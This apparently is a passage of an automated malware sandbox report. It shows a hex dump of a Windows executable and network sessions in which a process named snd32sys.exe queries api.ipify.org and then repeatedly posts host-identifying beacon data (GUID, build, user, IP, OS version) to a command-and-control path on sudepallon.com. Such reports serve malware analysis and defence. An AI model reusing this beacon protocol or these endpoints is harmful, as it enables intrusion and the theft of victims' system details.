00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec b8 40 af 05 01 05 70 5b 07 01 05 f8 53 08 01 05 60 9a 09 01 05 f0 32 09 01 2d c8 53 08 01 05 b0 27 09 01 a3 ac 7a 13 01 5d c3 68 e5 6f 07 01 e8 41 a2 01 00 59 c3 68 ef 6f 07 01 e8 35 a2 01 00 59 c3 b9 18 ee 09 01 e8 55 15
                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$cmmmmmmmmmmmmRichmPEL<`bpW@u@ @Gp9T9@.text`b `.rdataPf@@.data^l@.rsrc@@@.reloc@G H^@BU@p[S`2-S'z]hoAYho5YU


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  10192.168.2.34976477.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:56.518250942 CEST6034OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:56.586610079 CEST6034INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:58 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 48 41 5a 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cHAZSARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  11192.168.2.34976577.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:56.938754082 CEST6035OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:57.006598949 CEST6035INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:58 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 46 56 45 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cFVEUARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  12192.168.2.34976677.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:57.339512110 CEST6036OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:57.414515972 CEST6037INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:58 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 51 41 5a 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cQAZJARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  13192.168.2.34976777.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:57.757333994 CEST6037OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:57.826961040 CEST6038INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:59 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 46 4a 51 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cFJQUARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  14192.168.2.34976877.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:58.204698086 CEST6039OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:58.276258945 CEST6039INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:59 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cVZAEARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  15192.168.2.34976977.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:58.606812954 CEST6040OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:58.675935984 CEST6040INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:00 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4d 43 58 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cMCXNARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  16192.168.2.34977077.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:59.018161058 CEST6041OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:59.090984106 CEST6042INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:00 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNKPMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  17192.168.2.34977177.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:59.415894985 CEST6043OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:59.487183094 CEST6043INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:00 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNNMMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  18192.168.2.34977277.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:59.801717997 CEST6044OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:59.868599892 CEST6044INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:01 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNKPMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  19192.168.2.34977377.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:00.207560062 CEST6045OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:00.276813984 CEST6045INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:01 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cFKPUARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.34975623.21.173.15580C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:52.909492970 CEST5479OUTGET / HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: api.ipify.org
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Jul 8, 2021 16:31:53.014983892 CEST5479INHTTP/1.1 200 OK
                                                                                                                                                  Server: Cowboy
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                  Vary: Origin
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:52 GMT
                                                                                                                                                  Content-Length: 14
                                                                                                                                                  Via: 1.1 vegur
                                                                                                                                                  Data Raw: 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30
                                                                                                                                                  Data Ascii: 185.189.150.70


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  20192.168.2.34977477.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:00.613718033 CEST6046OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:00.681197882 CEST6046INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:02 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 41 54 47 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cATGZARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  21192.168.2.34977577.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:01.018528938 CEST6047OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:01.088430882 CEST6047INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:02 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 4e 48 53 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cNHSMARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  22192.168.2.34977677.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:01.437737942 CEST6048OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:01.505616903 CEST6049INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:32:02 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cGMNTARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  23192.168.2.34977777.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:32:01.835478067 CEST6049OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:32:01.903317928 CEST6050INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
